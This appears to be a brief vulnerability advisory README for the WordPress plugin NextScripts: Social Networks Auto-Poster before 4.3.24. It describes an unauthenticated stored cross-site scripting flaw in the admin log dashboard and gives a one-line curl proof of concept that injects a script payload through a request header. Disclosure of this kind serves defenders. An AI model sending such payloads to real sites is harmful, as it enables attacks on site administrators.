.. | |||
README.md | Loading last commit info... |
README.md
NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue
Proof of Concept
curl -H 'x-tomato: <script>alert(/XSS/);</script>' 'https://example.com/?nxs-cronrun=yes'
The XSS will be triggered in the Log/History dashboard (/wp-admin/admin.php?page=nxs-log)